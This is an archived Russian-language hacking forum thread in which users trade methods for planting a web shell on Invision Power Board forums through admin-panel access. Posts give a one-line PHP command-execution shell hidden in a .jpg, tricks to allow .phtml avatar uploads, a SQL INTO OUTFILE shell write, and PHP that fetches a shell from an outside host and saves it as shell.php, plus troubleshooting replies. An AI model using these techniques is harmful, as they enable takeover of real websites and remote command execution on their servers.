PDA

Просмотр полной версии : Заливка шелла в Ipb 2.0.*

GreenBear
09.12.2005, 21:56
Вроде бы довольно частый вопрос о том, как заливать шелл в ipb 2.0.* и 2.1.*
Ну вот, сразу что пришло в голову, проверить на глупость =))
Разрешить в профиле загружать файлы пхп, пришол облом, они становились файлами notepad =(
Думаю я, думаю, а ведь пхп и пхтмл одно и тоже =))
иду в настройки и пишу в главной конфигурации\профиль пользователей\аватары в конце ,pthml
После иду в атачи и делаю там еще один тип - .phtml
mime тип пишем от пхп файлов, то есть application/octet-stream
ок. разрешаем. идем в профиль, грузим аватар, смотрим к нему путь - и там наш шел, av-1.phtml =))
ВОт и все.

Lord Nikon
09.12.2005, 22:11
Не дурно =).

Arthas
22.12.2005, 23:37
Green_Bear
скажи пожалуйста как сделать тоже самое только на версий IPB 1.1.2

Tem
22.12.2005, 23:54
Ты попробовал залить его через самайлики ?

Arthas
23.12.2005, 00:31
Tem
конечно, первое что сделал попытался кинуть шаблон через самайлики но там нету обзора =(

Tem
23.12.2005, 00:45
Через шаблоны попробуй ((

Arthas
23.12.2005, 00:54
пипл, не знаите где найти атачи в IPB v 1.1.2

banall
03.07.2006, 07:55
Такая же проблема, залил в виде phtml, но шелл не запускается а выдает исходник, что делать то?
как запускать, что надо изменить в начале и в конце php чтобы phtml заработал?

Nova
03.07.2006, 12:08
Такая же проблема, залил в виде phtml, но шелл не запускается а выдает исходник, что делать то?
как запускать, что надо изменить в начале и в конце php чтобы phtml заработал?

А ты тип файла прописал ?
не расширение а тип файла ?

Гаврила
28.07.2006, 16:28
Да, у меня по этой схеме тоже отрывает исходник.
Странно.

GreenBear
28.07.2006, 17:33
Все зависит от настроек апача.
Видать не прописан phtml там =)

orex
09.08.2006, 21:59
Ребят , пытаюсь через смайлы залить пишет:мона типа тока изображ gif ,jpg и тд ,
пытался через phtml тоже отшило (: как еще залить можно ?

VampiRUS
11.08.2006, 13:58
предлагаю ещё способ: заливаем файл .jpg например с таким содержанием

<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').

Azazel
11.08.2006, 14:59
Папки на сервере должны быть на запись открыты. Этим руководит админ. 2 orex, читай внимательно.

orex
12.08.2006, 15:44
нашел тута еще тему про подмену хттп запроса (: ща попробую разобратся ;)

*Van*
15.08.2006, 13:30
предлагаю ещё способ: заливаем файл .jpg например с таким содержанием

<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').

Для этого необходимо ещё знать путь к директории с форумом.

Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?

Inferno
15.08.2006, 14:49
Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
Незнаю у меня таким методом файл не цыпляется в ачачи и аватары!

SanyaX
15.08.2006, 18:45
Только что проверил. Всё пашет. Михе респект.

Inferno
15.08.2006, 18:51
Только что проверил. Всё пашет. Михе респект.
А на каком форуме пробывал,может ещё зависит от настройки апачя?

~Real F@ck!~
22.09.2006, 19:49
Мужики что делать? Пишет мол фаил с аватором слишком большой? А админка на английском, немогу понять что к чему, помогить плиз пока меня там нафиг неудалили из админки!

Dimazzz
25.09.2006, 02:21
Проблема такая!

Имею доступ к админке IPB 2.1.6
но не могу залить шелл ни через атачи (меняет разрешение и PHP не выполняется наверно потомучто в папку upload)

также немогу через смайлы =( нет доступа

Какие есть еще варианты залить шелл??

qPhoenix
25.09.2006, 14:52
Можно через мускуль...

к примеру:

CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`
DROP TABLE `ibf_shell`

SanyaX
25.09.2006, 14:56
Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.

Dimazzz
25.09.2006, 15:13
Для всех чтоыб не было проблемм с заливкой шеллов.
В версиях 1.*-2.0.* шелл заливаеться через смайлы.
Потом просто заходим по такому пути как залили http://www.site.pru/patch_forum/html/emoticons/name_shell.php.
В версиях 2.1.* шелл заливаеться через аватары.
Предварительно берём добавляем в типы файлов расшифрение .phtml и ставим mime тип application/octet-stream , следовательно там же указываем разрешение загрузку аватар и фотографий.
Потом добавляем в профилях пользователей заливка расшифрений .phtml и размер любой ( чем больше тем лучше).
Потом спокойно заливаем шелл и в свойствах смотрим путь до шелла.
Причины почему шелл не залился: Стоят права на папки avatars или html/emoticons, стоит safe-mod.

3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads

SanyaX
25.09.2006, 15:22
3 раз повторяю =) это версия 2.1.6 и через смайлы там в любом случае неплучится так как пра нехватает.
А второй вариан не прокатывает так как после запуска шелла выдает его исходный код, не вы выполняются сценарии в этои папке Uploads
ТЫ что чушь гонишь? Я тебе про аватары написал ДЛЯ 2.1.6. причём тут папка uploads?? Шелл грузиться в аватары + расширенеи надо .phtml. Вообщем в посте выше я всё описал. Читать надо внимательней.

navigat0r
30.04.2009, 01:15
имеется IP.Board v2.3.5
но не могу залить шелл через атачи
также немогу через смайлы
пробывал через стили, тоже не выходит
может кто знает есчо способ??

warlok
30.04.2009, 04:04
navigat0r там возможно произвольное выполнение php кода , когда добовляеш системную настройку.
Воть нашол у себя, думаю должен понять ;)
http://depositfiles.com/files/17mnmm05v

navigat0r
30.04.2009, 11:00
делал также как и в видео, мне пишет что страница не найдена.МОжет оно в другое место сохранило?Как узнать куда сохраняет?
$data=implode('',file('http://navigat0r.kilu.de/shell/wso.txt'));
$fp=fopen('./shell.php','wb');
fputs($fp,$data);
fclose($fp);
правильно я написал??

navigat0r
30.04.2009, 11:06
короче в этой админке так не катит.Пробывал в других, работает.Тут наверно куда-то в др место сохраняет.Чё можно есчо придумать?